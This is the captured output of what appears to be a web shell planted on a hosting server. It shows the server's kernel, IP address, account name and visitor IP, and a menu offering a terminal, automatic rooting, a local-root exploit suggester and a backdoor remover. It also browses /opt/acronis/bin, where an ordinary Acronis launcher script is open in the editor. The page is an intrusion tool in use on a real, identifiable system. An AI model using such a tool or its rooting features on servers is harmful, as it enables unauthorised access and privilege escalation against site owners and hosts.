Linux 43-250-141-107.cprapid.com 4.18.0-553.150.1.lve.el8.x86_64 #1 SMP Tue Aug 4 17:30:48 UTC 2026 x86_64
LiteSpeed
Server IP : 43.250.141.107 & Your IP : 216.73.217.65
Domains :
Cant Read [ /etc/named.conf ]
User : thepngre
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
acronis /
bin /
Delete
Unzip
Name
Size
Permission
Date
Action
acp-update-controller
9.33
MB
-rwxr-xr-x
2026-07-27 23:19
adp-agent
11.57
MB
-rwxr-xr-x
2026-07-27 23:19
adp-rest-util
75.02
KB
-rwxr-xr-x
2026-07-27 23:19
adp-rest-util.sh
195
B
-rwxr-xr-x
2026-07-27 23:19
cred-store
18.8
MB
-rwxr-xr-x
2026-07-27 23:19
cyber-desktop-agent-qt5
14.91
MB
-rwxr-xr-x
2026-07-27 23:19
cyber-desktop-agent-qt6
18.31
MB
-rwxr-xr-x
2026-07-27 23:19
cyber-desktop-agent.sh
717
B
-rwxr-xr-x
2026-07-27 23:19
cyber-desktop-service-qt5
7.14
MB
-rwxr-xr-x
2026-07-27 23:19
cyber-desktop-service-qt6
6.87
MB
-rwxr-xr-x
2026-07-27 23:19
cyber-desktop-service.sh
702
B
-rwxr-xr-x
2026-07-27 23:19
feedback-collector
14.34
MB
-rwxr-xr-x
2026-07-27 23:19
grpm-sync-unit
12.03
MB
-rwxr-xr-x
2026-07-27 23:19
private-cloud-proxy
24.91
MB
-rwxr-xr-x
2026-07-27 23:19
siem-connector
27.52
MB
-rwxr-xr-x
2026-07-27 23:19
task-manager
53.25
MB
-rwxr-xr-x
2026-07-27 23:19
updater
143.25
MB
-rwxr-xr-x
2026-07-27 23:19
Save
Rename
#!/bin/sh # Note: assumes GNU libc (ldd --version format) LDD_VERSION=`ldd --version | sed 's/.* //;q'` if echo "$LDD_VERSION" | awk -F. '{ if ($1 > 2 || ($1 == 2 && $2 >= 31)) { exit 0 } else { exit 1 } }'; then export LD_LIBRARY_PATH=/opt/acronis/lib/cyber-desktop-service-qt6:/opt/acronis/lib exec /opt/acronis/bin/cyber-desktop-agent-qt6 --capture else # Yes, paths are in reverse order for Qt5. This is intentional. # In the old build we had log dir and Qt plugins dir derived from the first item, # so we need to keep it in the same order. export LD_LIBRARY_PATH=/opt/acronis/lib:/opt/acronis/lib/cyber-desktop-service-qt5 exec /opt/acronis/bin/cyber-desktop-agent-qt5 --capture fi